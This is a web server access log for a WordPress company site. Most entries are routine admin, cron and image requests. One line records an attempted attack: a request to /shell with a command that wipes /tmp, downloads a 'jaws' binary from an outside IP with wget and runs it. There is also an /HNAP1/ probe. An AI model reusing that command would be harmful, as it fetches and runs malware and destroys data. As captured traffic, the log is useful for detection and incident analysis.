14.108.232.209 - - [22/Aug/2025:11:56:12 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 78 "http://cqqizhou.com/wp-admin/options-general.php?page=wprocket" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.232.209 - - [22/Aug/2025:11:56:40 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 78 "http://cqqizhou.com/wp-admin/plugins.php?s=LiteSpeed&plugin_status=all" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
36.133.115.36 - - [22/Aug/2025:11:57:40 +0800] "POST /wp-cron.php?doing_wp_cron=1755835060.0815730094909667968750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
14.108.232.209 - - [22/Aug/2025:11:57:40 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 78 "http://cqqizhou.com/wp-admin/plugins.php?s=LiteSpeed&plugin_status=all" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
36.133.115.36 - - [22/Aug/2025:11:58:09 +0800] "POST /wp-cron.php?doing_wp_cron=1755835089.3356990814208984375000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
14.108.232.209 - - [22/Aug/2025:11:58:09 +0800] "GET / HTTP/1.1" 200 39124 "https://www.baidu.com/link?url=Djt6s87xUg5P_iln7Ps_PpGWL4QxG9hTVqtySEVpgIG&wd=&eqid=d45c810c001258610000000668a7eaeb" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:11:58:09 +0800] "GET /wp-content/uploads/2025/07/1751425283-qizhou.kf_.qq_.com_.webp HTTP/1.1" 200 16864 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:11:58:09 +0800] "GET /wp-content/uploads/2025/07/1753456723-%E5%8F%8C%E7%9B%B8%E9%92%A2roduct_Single600.webp HTTP/1.1" 200 22790 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:11:58:09 +0800] "GET /wp-content/uploads/2025/07/1753453096-%E5%8F%8C%E7%9B%B8%E9%92%A2product_Single600%C3%97284.webp HTTP/1.1" 200 14562 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:11:58:10 +0800] "GET /wp-content/uploads/2025/07/1753456770-%E7%83%AD%E9%95%80%E9%94%8C%E5%8D%B7product_Single600.webp HTTP/1.1" 200 27502 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:11:58:10 +0800] "GET /wp-content/uploads/2025/07/1753453127-%E4%BD%99%E5%8D%B7product_Single600%C3%97284.webp HTTP/1.1" 200 18744 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:11:58:10 +0800] "GET /wp-content/uploads/2025/07/1753454089-Article_images_W900px.webp HTTP/1.1" 200 27552 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:11:58:10 +0800] "GET /wp-content/uploads/2025/07/1753454299-Article_images_W900px.webp HTTP/1.1" 200 52418 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:11:58:13 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 78 "http://cqqizhou.com/wp-admin/options-general.php?page=wprocket" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.232.209 - - [22/Aug/2025:11:58:15 +0800] "GET /wp-content/uploads/revslider/slider-1/1750929639-yuanjing_Slider_3840%C3%972160_20250626171955-scaled.webp HTTP/1.1" 200 203290 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:11:58:15 +0800] "GET /wp-content/uploads/2025/07/1753587901-Slider_3840%C3%972160_20250727-scaled-50x100.webp HTTP/1.1" 200 1660 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:11:58:15 +0800] "GET /wp-content/uploads/revslider/slider-1/1750861156-logistics_Slider_3840%C3%972160_20250625191356-scaled-50x100.webp HTTP/1.1" 200 1416 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:11:58:16 +0800] "GET /wp-json/sliderrevolution/sliders/1?srengine=7&slideid=2 HTTP/1.1" 200 2058 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:11:58:16 +0800] "GET /wp-json/sliderrevolution/sliders/1?srengine=7&slideid=3 HTTP/1.1" 200 2292 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:11:58:16 +0800] "GET /wp-content/uploads/revslider/slider-1/1750861156-logistics_Slider_3840%C3%972160_20250625191356-scaled.webp HTTP/1.1" 200 197360 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:11:58:16 +0800] "GET /wp-content/uploads/2025/07/1753587901-Slider_3840%C3%972160_20250727-scaled.webp HTTP/1.1" 200 141034 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:11:58:17 +0800] "GET /wp-content/uploads/2025/07/1750174127-Marketing1920x800_3.webp HTTP/1.1" 200 52790 "http://cqqizhou.com/wp-content/uploads/elementor/css/post-1666.css?ver=1755834647" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:11:58:21 +0800] "GET / HTTP/1.1" 200 39124 "https://www.baidu.com/link?url=Djt6s87xUg5P_iln7Ps_PpGWL4QxG9hTVqtySEVpgIG&wd=&eqid=d45c810c001258610000000668a7eaeb" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:11:58:22 +0800] "GET /wp-json/sliderrevolution/sliders/1?srengine=7&slideid=2 HTTP/1.1" 200 2058 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:11:58:22 +0800] "GET /wp-json/sliderrevolution/sliders/1?srengine=7&slideid=3 HTTP/1.1" 200 2292 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:11:58:30 +0800] "GET /wp-content/uploads/2025/07/1751829454-Smart-warehousing800x500.webp HTTP/1.1" 200 79504 "http://cqqizhou.com/wp-content/uploads/elementor/css/post-1666.css?ver=1755834647" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:11:58:37 +0800] "GET /wp-content/plugins/wp-rocket/assets/js/wpr-beacon.min.js.map HTTP/1.1" 200 83050 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:11:58:40 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 78 "http://cqqizhou.com/wp-admin/plugins.php?s=LiteSpeed&plugin_status=all" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
36.133.115.36 - - [22/Aug/2025:11:59:40 +0800] "POST /wp-cron.php?doing_wp_cron=1755835180.1538140773773193359375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
14.108.232.209 - - [22/Aug/2025:11:59:40 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 78 "http://cqqizhou.com/wp-admin/plugins.php?s=LiteSpeed&plugin_status=all" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
36.133.115.36 - - [22/Aug/2025:12:00:14 +0800] "POST /wp-cron.php?doing_wp_cron=1755835214.8627030849456787109375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
14.108.232.209 - - [22/Aug/2025:12:00:14 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 78 "http://cqqizhou.com/wp-admin/options-general.php?page=wprocket" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
46.99.251.170 - - [22/Aug/2025:12:00:22 +0800] "GET / HTTP/1.0" 200 151647 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
45.156.87.165 - - [22/Aug/2025:12:00:40 +0800] "GET /HNAP1/ HTTP/1.1" 499 0 "-" "Mozilla/5.0 (bang2012@protonmail.com)"
14.108.232.209 - - [22/Aug/2025:12:00:40 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 78 "http://cqqizhou.com/wp-admin/plugins.php?s=LiteSpeed&plugin_status=all" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
36.133.115.36 - - [22/Aug/2025:12:02:15 +0800] "POST /wp-cron.php?doing_wp_cron=1755835335.9147779941558837890625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
14.108.232.209 - - [22/Aug/2025:12:02:16 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 78 "http://cqqizhou.com/wp-admin/options-general.php?page=wprocket" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.232.209 - - [22/Aug/2025:12:02:41 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 78 "http://cqqizhou.com/wp-admin/plugins.php?s=LiteSpeed&plugin_status=all" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
36.133.115.36 - - [22/Aug/2025:12:04:10 +0800] "POST /wp-cron.php?doing_wp_cron=1755835450.4670090675354003906250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
218.104.149.215 - - [22/Aug/2025:12:04:10 +0800] "GET / HTTP/1.1" 200 151669 "-" "-"
1.24.16.111 - - [22/Aug/2025:12:04:17 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
36.133.108.121 - - [22/Aug/2025:12:04:26 +0800] "HEAD / HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36"
14.108.232.209 - - [22/Aug/2025:12:04:42 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 78 "http://cqqizhou.com/wp-admin/plugins.php?s=LiteSpeed&plugin_status=all" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
36.133.115.36 - - [22/Aug/2025:12:05:45 +0800] "POST /wp-cron.php?doing_wp_cron=1755835545.6660239696502685546875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [22/Aug/2025:12:05:46 +0800] "GET / HTTP/1.1" 200 33393 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
14.108.232.209 - - [22/Aug/2025:12:06:43 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 78 "http://cqqizhou.com/wp-admin/plugins.php?s=LiteSpeed&plugin_status=all" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.232.209 - - [22/Aug/2025:12:07:33 +0800] "GET /wp-content/uploads/revslider/slider-1/1750929639-yuanjing_Slider_3840%C3%972160_20250626171955-scaled-50x100.webp HTTP/1.1" 200 1784 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
36.133.115.36 - - [22/Aug/2025:12:07:33 +0800] "POST /wp-cron.php?doing_wp_cron=1755835653.7505080699920654296875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
14.108.232.209 - - [22/Aug/2025:12:07:34 +0800] "GET /about/ HTTP/1.1" 200 29870 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:12:07:34 +0800] "GET /wp-content/uploads/2025/07/1750649803-qizhou800x500_2.webp HTTP/1.1" 200 63616 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:12:07:34 +0800] "GET /wp-content/uploads/2025/07/1750945417-honor300%C3%97206_1.webp HTTP/1.1" 200 57666 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:12:07:34 +0800] "GET /wp-content/uploads/2025/07/1750945444-honor300%C3%97206_2.webp HTTP/1.1" 200 71296 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:12:07:34 +0800] "GET /wp-content/uploads/2025/07/1750671800-partner1_200x50.webp HTTP/1.1" 200 2244 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:12:07:34 +0800] "GET /wp-content/uploads/2025/07/1750671801-partner2_200x50.webp HTTP/1.1" 200 3946 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:12:07:34 +0800] "GET /wp-content/uploads/2025/07/1750671803-partner3_200x50.webp HTTP/1.1" 200 4414 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:12:07:34 +0800] "GET /wp-content/uploads/2025/07/1750671805-partner4_200x50.webp HTTP/1.1" 200 2390 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:12:07:34 +0800] "GET /wp-content/uploads/2025/07/1750671806-partner5_200x50.webp HTTP/1.1" 200 2840 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:12:07:34 +0800] "GET /wp-content/uploads/2025/07/1750671808-partner6_200x50.webp HTTP/1.1" 200 3004 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:12:07:34 +0800] "GET /wp-content/uploads/2025/06/1750755307-qizhoucangku2000x400_2025624.webp HTTP/1.1" 200 45470 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:12:07:34 +0800] "GET /wp-content/uploads/elementor/thumbs/1751209300-Hello-Qizhou3-r91b71mdtei8mab1rr8x739cnvi1mafuaga3vbed3o.webp HTTP/1.1" 200 39120 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:12:07:34 +0800] "GET /wp-content/uploads/elementor/thumbs/1751373145-About_Qizhoudalou_W800px-r91b70ok8huvvdr4ynxnf302e8ie3iydlh6ag9ew82.webp HTTP/1.1" 200 37938 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:12:07:35 +0800] "GET /wp-content/uploads/2025/07/1750649186-qizhou1920x1080_3.webp HTTP/1.1" 200 134070 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:12:07:35 +0800] "GET /wp-content/uploads/2025/07/1750649179-qizhou1920x1080_1.webp HTTP/1.1" 200 172154 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:12:07:35 +0800] "GET /wp-content/uploads/2025/07/1750649183-qizhou1920x1080_2.webp HTTP/1.1" 200 267936 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:12:07:35 +0800] "GET /wp-content/uploads/2025/07/1750649189-qizhou1920x1080_4.webp HTTP/1.1" 200 174962 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:12:07:35 +0800] "GET /wp-content/uploads/2025/07/1750649197-qizhou1920x1080_6.webp HTTP/1.1" 200 150354 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:12:07:35 +0800] "GET /wp-content/uploads/2025/07/1750649193-qizhou1920x1080_5.webp HTTP/1.1" 200 110214 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:12:07:35 +0800] "GET /wp-content/uploads/2025/07/1750649200-qizhou1920x1080_7.webp HTTP/1.1" 200 238866 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:12:07:35 +0800] "GET /wp-content/uploads/2025/07/1750649203-qizhou1920x1080_8.webp HTTP/1.1" 200 256782 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:12:07:35 +0800] "GET /wp-content/uploads/2025/07/1750649207-qizhou1920x1080_9.webp HTTP/1.1" 200 146108 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:12:07:35 +0800] "GET /wp-content/uploads/2025/07/1750649215-qizhou1920x1080_11.webp HTTP/1.1" 200 171642 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:12:07:35 +0800] "GET /wp-content/uploads/2025/07/1750649212-qizhou1920x1080_10.webp HTTP/1.1" 200 143362 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:12:07:37 +0800] "GET /wp-content/uploads/2025/07/1750945514-honor300%C3%97206_3.webp HTTP/1.1" 200 74124 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:12:07:37 +0800] "GET /wp-content/uploads/2025/07/1750945616-honor300%C3%97206_4.webp HTTP/1.1" 200 33814 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:12:07:37 +0800] "GET /wp-content/uploads/2025/07/1750945637-honor300%C3%97206_5.webp HTTP/1.1" 200 77368 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:12:07:37 +0800] "GET /wp-content/uploads/2025/07/1750945650-honor300%C3%97206_6.webp HTTP/1.1" 200 66306 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
14.108.232.209 - - [22/Aug/2025:12:07:37 +0800] "GET /wp-content/uploads/2025/07/1750656103-Visionr2000x800_20250623131702.webp HTTP/1.1" 200 57650 "http://cqqizhou.com/wp-content/uploads/elementor/css/post-1849.css?ver=1755835654" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"
36.133.115.36 - - [22/Aug/2025:12:08:03 +0800] "POST /wp-cron.php?doing_wp_cron=1755835683.1450500488281250000000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
14.108.232.209 - - [22/Aug/2025:12:08:03 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 78 "http://cqqizhou.com/wp-admin/plugins.php?s=LiteSpeed&plugin_status=all" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
36.133.115.36 - - [22/Aug/2025:12:09:03 +0800] "POST /wp-cron.php?doing_wp_cron=1755835743.8872349262237548828125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
14.108.232.209 - - [22/Aug/2025:12:09:03 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 78 "http://cqqizhou.com/wp-admin/plugins.php?s=LiteSpeed&plugin_status=all" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
41.46.232.196 - - [22/Aug/2025:12:10:01 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.150.159/jaws;sh+/tmp/jaws HTTP/1.1" 499 0 "-" "Hello, world"
36.133.115.36 - - [22/Aug/2025:12:10:01 +0800] "POST /wp-cron.php?doing_wp_cron=1755835801.8375029563903808593750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.115.36 - - [22/Aug/2025:12:11:04 +0800] "POST /wp-cron.php?doing_wp_cron=1755835864.8595209121704101562500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
14.108.232.209 - - [22/Aug/2025:12:11:04 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 78 "http://cqqizhou.com/wp-admin/plugins.php?s=LiteSpeed&plugin_status=all" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
36.133.115.36 - - [22/Aug/2025:12:13:06 +0800] "POST /wp-cron.php?doing_wp_cron=1755835986.1069779396057128906250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
14.108.232.209 - - [22/Aug/2025:12:13:06 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 78 "http://cqqizhou.com/wp-admin/plugins.php?s=LiteSpeed&plugin_status=all" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
36.133.115.36 - - [22/Aug/2025:12:15:06 +0800] "POST /wp-cron.php?doing_wp_cron=1755836106.8902409076690673828125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
